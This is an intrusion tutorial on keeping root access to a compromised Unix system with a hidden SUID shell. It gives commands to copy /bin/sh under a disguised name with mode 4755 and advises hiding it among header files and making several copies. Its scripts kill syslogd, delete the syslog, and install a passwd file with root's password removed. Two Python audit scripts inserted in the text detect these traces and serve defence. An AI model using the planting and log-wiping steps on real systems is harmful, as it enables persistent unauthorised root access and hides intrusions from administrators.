A SUID shell is a shell binary that runs with the permissions of its owner. That is to say, if the owner is root, whoever executes it runs commands as root. The permissions of an ordinary shell file are rwxr-xr-x: the owner is root, and root can read, write and execute the shell, while other users can only read it and run it with their own permissions. However, if a shell's permissions are rwsr-xr-x, whoever runs it obtains the permissions of the file's owner. If the owner is root, then any user who runs this shell can control the entire system: adding users, changing the root password, clearing logs, and so on.
Why?
This is a very easy question to answer. When you get into a system by some method, a system administrator of any competence will soon notice the problem. They usually review the logs and change the root password, and you may have to say goodbye to the system. This is why a SUID shell is needed. :)
How can we get a SUID shell?
First, you need to be clever enough, depending on what kind of system administrator you are facing. When, after trying every method (password guessing, sniffing, attacking a security vulnerability), you have finally obtained root permission, quickly find a directory that is almost never used. In any case, do not place the SUID shell in your home directory. A better choice is a deep subdirectory under /usr, such as /usr/X11/include/X11/. Hardly anyone enters this directory, and the system administrator will rarely check the files in it because it holds so many. In addition, the SUID shell's name should be as similar as possible to the other files there. For example, if the directory contains files such as sync.h and shape.h, the SUID shell can take the name part.h, which is inconspicuous.
Another good option is to place the SUID shell among other SUID programs, for example in /usr/sbin, under an inconspicuous name.
Then create the SUID shell in one of these directories. For example:
cp /bin/sh /usr/X11/include/X11/extensions/part.h
chmod 4755 /usr/X11/include/X11/extensions/part.h
Note: to complete the whole process in the shortest time, make appropriate preparations before entering the system. It is best to study the system carefully and plan before attempting an attack. In addition, always create several SUID shells, so that even if one of them is found there is still a chance to control the system with the others.
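The planting steps above leave three traces an administrator can look for: a setuid bit on a file outside the directories where setuid binaries normally live, an executable carrying a header-file name, and file contents identical to one of the system's shells. The following Python audit, added here as an example and not part of the original article, checks for all three. EXPECTED_SUID_DIRS, ODD_SUFFIXES and the shell candidate list are assumptions to be tuned to the host being audited.

```python
import hashlib
import os
import stat

# Directories in which setuid binaries are normally expected on a Linux host.
# Assumption: adjust this list to the distribution being audited.
EXPECTED_SUID_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin",
                      "/usr/lib", "/usr/libexec", "/usr/local/bin", "/usr/local/sbin")

# A setuid file with one of these suffixes is posing as a header or data file.
ODD_SUFFIXES = (".h", ".c", ".txt", ".conf", ".dat", ".log")


def file_digest(path):
    """SHA-256 of a file's contents, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def shell_digests(candidates=("/bin/sh", "/bin/bash", "/bin/dash", "/bin/ksh", "/bin/csh")):
    """Fingerprint the system's legitimate shells so that a renamed copy is
    recognised by content no matter what it was called."""
    known = {}
    for path in candidates:
        if os.path.isfile(path):
            known[file_digest(path)] = path
    return known


def find_suid_files(root):
    """Walk root and return (path, stat_result) for every regular file with the setuid bit."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                info = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished during the walk
            if stat.S_ISREG(info.st_mode) and info.st_mode & stat.S_ISUID:
                found.append((path, info))
    return found


def _inside(path, directories):
    return any(path.startswith(d.rstrip("/") + "/") for d in directories)


def classify(path, info, known_shells, expected_dirs=EXPECTED_SUID_DIRS):
    """Return the reasons a setuid file looks planted; an empty list means nothing odd."""
    reasons = []
    if not _inside(path, expected_dirs):
        reasons.append("setuid file (owner uid %d) outside the usual setuid directories" % info.st_uid)
    if path.lower().endswith(ODD_SUFFIXES):
        reasons.append("setuid file carries a source or data file extension")
    try:
        digest = file_digest(path)
    except OSError:
        digest = None  # mode 4711 binaries cannot be read by non-root users
    if digest in known_shells:
        reasons.append("contents identical to %s" % known_shells[digest])
    return reasons


def audit(root, known_shells, expected_dirs=EXPECTED_SUID_DIRS):
    """Map each suspicious setuid file under root to its list of reasons."""
    findings = {}
    for path, info in find_suid_files(root):
        reasons = classify(path, info, known_shells, expected_dirs)
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in sorted(audit("/", shell_digests()).items()):
        print(path)
        for reason in reasons:
            print("    -", reason)
```

Run it as root so that every setuid file is readable; a copy of /bin/sh that has been given a new name is caught by the digest comparison even when it sits in a directory you did not think to list.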
How to use a SUID shell?
On many systems the shells a user may use are restricted; you only need to check the corresponding file under /etc. On Linux this file is /etc/shells, which lists all the permitted shell programs. But with a SUID shell you can do anything! For example, say you want to rename /etc/passwd to /etc/passwd.heh. Write the following script:
#!/usr/X11/include/X11/extensions/part.h
mv /etc/passwd /etc/passwd.heh
exit
(This is just an example. It is best not to do this :))
The above example seems to give only a non-interactive program, but if you write the script carefully you can also build a sort of "interactive" program.
If you still want interactive access, read on.
Copy /etc/passwd to your home directory and edit it to delete root's encrypted password. Enter `ps ax | grep syslog` to obtain the syslogd process number. Then run the following script as `interactive XX` (XX is the syslogd process number):
#!/usr/X11/include/X11/extensions/part.h
kill -9 $1                       # $1 is the syslogd process number given on the command line
rm -f /var/adm/syslog
cp /etc/passwd /etc/passwd.old   # keep the original so it can be restored afterwards
cp ~/passwd /etc/passwd          # install the copy edited in your home directory
chmod 644 /etc/passwd
exit
Now you can become root without a password.
After finishing your "work", remember to run the following script to put the original password file back:
#!/usr/X11/include/X11/extensions/part.h
cp /etc/passwd.old /etc/passwd
chmod 644 /etc/passwd
exit
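The two script tricks in this section, a #! line that names a setuid interpreter and an /etc/passwd whose root entry has had its password field emptied, can both be checked for from the administrator's side. The following Python, added here as an example and not part of the original article, does that: check_script() inspects a script's interpreter line and the interpreter's mode bits, and passwd_problems() scans passwd(5) text for accounts that need no password or that duplicate uid 0. INTERPRETER_DIRS is an assumption to adjust to the host.

```python
import os
import stat

# Directories that legitimately hold script interpreters.
# Assumption: adjust this list to the host being audited.
INTERPRETER_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/libexec")


def interpreter_of(script_path):
    """Return the program named on a script's #! line, or None if there is no #! line."""
    with open(script_path, "rb") as handle:
        first_line = handle.readline(512)
    if not first_line.startswith(b"#!"):
        return None
    words = first_line[2:].strip().split()
    return words[0].decode("utf-8", errors="replace") if words else None


def check_script(script_path, interpreter_dirs=INTERPRETER_DIRS):
    """Reasons the script's interpreter line looks abusive; an empty list means nothing odd."""
    reasons = []
    interpreter = interpreter_of(script_path)
    if interpreter is None:
        return reasons
    if not any(interpreter.startswith(d.rstrip("/") + "/") for d in interpreter_dirs):
        reasons.append("interpreter %s is outside the usual interpreter directories" % interpreter)
    try:
        info = os.stat(interpreter)
    except OSError:
        reasons.append("interpreter %s does not exist" % interpreter)
        return reasons
    if info.st_mode & (stat.S_ISUID | stat.S_ISGID):
        # The kernel honours setuid on the interpreter it execs for a #! script,
        # so a setuid shell named here runs the whole script with its owner's uid.
        reasons.append("interpreter %s is setuid or setgid" % interpreter)
    return reasons


def passwd_problems(passwd_text):
    """Scan passwd(5) text and return (account, reason) pairs for entries that
    need no password or that give a second account uid 0."""
    problems = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            problems.append((line, "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if password == "":
            problems.append((name, "empty password field: login without a password"))
        if uid == "0" and name != "root":
            problems.append((name, "extra uid 0 account"))
    return problems


if __name__ == "__main__":
    import sys
    for script in sys.argv[1:]:
        for reason in check_script(script):
            print(script, "-", reason)
    with open("/etc/passwd") as handle:
        for account, reason in passwd_problems(handle.read()):
            print(account, "-", reason)
```

Pass any scripts to inspect as arguments; the passwd check runs unconditionally. On hosts using shadow passwords the root field should read "x" or "*", never be empty, and a second uid 0 entry is never expected.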